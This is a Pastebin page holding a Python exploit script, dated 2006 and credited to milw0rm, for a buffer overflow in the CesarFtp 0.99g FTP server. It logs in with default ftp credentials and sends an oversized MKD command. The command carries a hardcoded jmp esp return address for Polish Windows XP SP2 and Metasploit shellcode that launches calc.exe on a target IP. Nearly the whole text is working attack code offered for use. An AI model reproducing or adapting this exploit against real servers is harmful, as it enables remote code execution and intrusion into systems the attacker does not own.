Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- #CesarFtp 0.99g 0day Exploit
- #Proof of Concept: execute calc.exe
- #Tested on XP sp2 polish
- #Bug found by h07 [h07@interia.pl]
- #Date: 10.06.2006
- from socket import *
- shellcode = ( #execute calc.exe <metasploit.com>
- "\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09"
- "\xde\x42\xd1\x83\xeb\xfc\xe2\xf4\xf5\xb4\xa9\x9c\xe1\x27\xbd\x2e"
- "\xf6\xbe\xc9\xbd\x2d\xfa\xc9\x94\x35\x55\x3e\xd4\x71\xdf\xad\x5a"
- "\x46\xc6\xc9\x8e\x29\xdf\xa9\x98\x82\xea\xc9\xd0\xe7\xef\x82\x48"
- "\xa5\x5a\x82\xa5\x0e\x1f\x88\xdc\x08\x1c\xa9\x25\x32\x8a\x66\xf9"
- "\x7c\x3b\xc9\x8e\x2d\xdf\xa9\xb7\x82\xd2\x09\x5a\x56\xc2\x43\x3a"
- "\x0a\xf2\xc9\x58\x65\xfa\x5e\xb0\xca\xef\x99\xb5\x82\x9d\x72\x5a"
- "\x49\xd2\xc9\xa1\x15\x73\xc9\x91\x01\x80\x2a\x5f\x47\xd0\xae\x81"
- "\xf6\x08\x24\x82\x6f\xb6\x71\xe3\x61\xa9\x31\xe3\x56\x8a\xbd\x01"
- "\x61\x15\xaf\x2d\x32\x8e\xbd\x07\x56\x57\xa7\xb7\x88\x33\x4a\xd3"
- "\x5c\xb4\x40\x2e\xd9\xb6\x9b\xd8\xfc\x73\x15\x2e\xdf\x8d\x11\x82"
- "\x5a\x9d\x11\x92\x5a\x21\x92\xb9\xc9\x76\x4e\xde\x6f\xb6\x52\x30"
- "\x6f\x8d\xcb\x30\x9c\xb6\xae\x28\xa3\xbe\x15\x2e\xdf\xb4\x52\x80"
- "\x5c\x21\x92\xb7\x63\xba\x24\xb9\x6a\xb3\x28\x81\x50\xf7\x8e\x58"
- "\xee\xb4\x06\x58\xeb\xef\x82\x22\xa3\x4b\xcb\x2c\xf7\x9c\x6f\x2f"
- "\x4b\xf2\xcf\xab\x31\x75\xe9\x7a\x61\xac\xbc\x62\x1f\x21\x37\xf9"
- "\xf6\x08\x19\x86\x5b\x8f\x13\x80\x63\xdf\x13\x80\x5c\x8f\xbd\x01"
- "\x61\x73\x9b\xd4\xc7\x8d\xbd\x07\x63\x21\xbd\xe6\xf6\x0e\x2a\x36"
- "\x70\x18\x3b\x2e\x7c\xda\xbd\x07\xf6\xa9\xbe\x2e\xd9\xb6\xb2\x5b"
- "\x0d\x81\x11\x2e\xdf\x21\x92\xd1")
- def intel_order(i):
- a = chr(i % 256)
- i = i >> 8
- b = chr(i % 256)
- i = i >> 8
- c = chr(i % 256)
- i = i >> 8
- d = chr(i % 256)
- str = "%c%c%c%c" % (a, b, c, d)
- return str
- host = "192.168.13.132"
- port = 21
- user = "ftp"
- password = "ftp"
- EIP = 0x77D8AF0A #jmp esp <shell32.dll XP sp2 polish>
- s = socket(AF_INET, SOCK_STREAM)
- s.connect((host, port))
- print s.recv(1024)
- s.send("user %s\r\n" % (user))
- print s.recv(1024)
- s.send("pass %s\r\n" % (password))
- print s.recv(1024)
- buffer = "MKD "
- buffer += "\n" * 671
- buffer += "A" * 3 + intel_order(EIP)
- buffer += "\x90" * 10 + shellcode
- buffer += "\r\n"
- print "len: %d" % (len(buffer))
- s.send(buffer)
- print s.recv(1024)
- s.close()
- #EoF
- # milw0rm.com [2006-06-12]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement